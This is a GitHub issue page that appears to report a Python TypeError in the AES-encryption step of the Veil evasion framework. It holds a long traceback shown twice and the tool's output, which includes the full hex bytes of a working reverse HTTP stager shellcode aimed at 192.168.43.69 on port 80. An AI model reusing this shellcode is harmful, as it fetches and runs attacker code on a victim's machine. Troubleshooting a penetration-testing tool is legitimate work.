You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository has been archived by the owner on Jan 10, 2024. It is now read-only.
Half way... Shellcode generated with Veil-Ordnance! Returning to Veil-Evasion.
Traceback (most recent call last):
File "/usr/share/veil/./Veil.py", line 145, in
the_conductor.main_menu()
File "/usr/share/veil/lib/common/orchestra.py", line 127, in main_menu
tool_object.tool_main_menu()
File "/usr/share/veil/tools/evasion/tool.py", line 368, in tool_main_menu
self.use_payload(selected_payload_module)
File "/usr/share/veil/tools/evasion/tool.py", line 400, in use_payload
selected_payload.generate()
File "/usr/share/veil/tools/evasion/payloads/python/shellcode_inject/aes_encrypt.py", line 89, in generate
encoded_ciphertext, encryption_key, iv_value = encryption.aes_encryption(Shellcode)
File "/usr/share/veil/tools/evasion/evasion_common/encryption.py", line 21, in aes_encryption
aes_cipher_object = AES.new(random_aes_key, AES.MODE_CBC, iv)
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 232, in new
return _create_cipher(sys.modules[name], key, mode, *args, **kwargs)
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/init.py", line 79, in _create_cipher
return modes[mode](factory, **kwargs)
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/_mode_cbc.py", line 274, in _create_cbc_cipher
cipher_state = factory._create_base_cipher(kwargs)
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 103, in _create_base_cipher
result = start_operation(c_uint8_ptr(key),
File "/usr/lib/python3/dist-packages/Cryptodome/Util/_raw_api.py", line 143, in c_uint8_ptr
raise TypeError("Object type %s cannot be passed to C code" % type(data))
TypeError: Object type <class 'str'> cannot be passed to C code
The text was updated successfully, but these errors were encountered:
Sign up for freeto subscribe to this conversation on GitHub.
Already have an account?
Sign in.
[] Payload Name: Reverse HTTP Stager (Stage 1)
[] IP Address: 192.168.43.69
[] Port: 80
[] Shellcode Size: 331
\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\x68\x3a\x56\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53\x68\x50\x00\x00\x00\xeb\x3a\x50\x68\x57\x89\x9f\xc6\xff\xd5\x53\x68\x00\x02\x60\x84\x53\x53\x53\xeb\x29\x53\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x96\x6a\x10\x5f\x53\x53\x53\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x18\x4f\x75\xed\x68\xf0\xb5\xa2\x56\xff\xd5\xeb\x42\xe8\xd2\xff\xff\xff\x2f\x4c\x69\x70\x37\x00\x00\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xbf\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\x7d\xff\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x34\x33\x2e\x36\x39\x00
Half way... Shellcode generated with Veil-Ordnance! Returning to Veil-Evasion.
Traceback (most recent call last):
File "/usr/share/veil/./Veil.py", line 145, in
the_conductor.main_menu()
File "/usr/share/veil/lib/common/orchestra.py", line 127, in main_menu
tool_object.tool_main_menu()
File "/usr/share/veil/tools/evasion/tool.py", line 368, in tool_main_menu
self.use_payload(selected_payload_module)
File "/usr/share/veil/tools/evasion/tool.py", line 400, in use_payload
selected_payload.generate()
File "/usr/share/veil/tools/evasion/payloads/python/shellcode_inject/aes_encrypt.py", line 89, in generate
encoded_ciphertext, encryption_key, iv_value = encryption.aes_encryption(Shellcode)
File "/usr/share/veil/tools/evasion/evasion_common/encryption.py", line 21, in aes_encryption
aes_cipher_object = AES.new(random_aes_key, AES.MODE_CBC, iv)
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 232, in new
return _create_cipher(sys.modules[name], key, mode, *args, **kwargs)
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/init.py", line 79, in _create_cipher
return modes[mode](factory, **kwargs)
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/_mode_cbc.py", line 274, in _create_cbc_cipher
cipher_state = factory._create_base_cipher(kwargs)
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 103, in _create_base_cipher
result = start_operation(c_uint8_ptr(key),
File "/usr/lib/python3/dist-packages/Cryptodome/Util/_raw_api.py", line 143, in c_uint8_ptr
raise TypeError("Object type %s cannot be passed to C code" % type(data))
TypeError: Object type <class 'str'> cannot be passed to C code
The text was updated successfully, but these errors were encountered: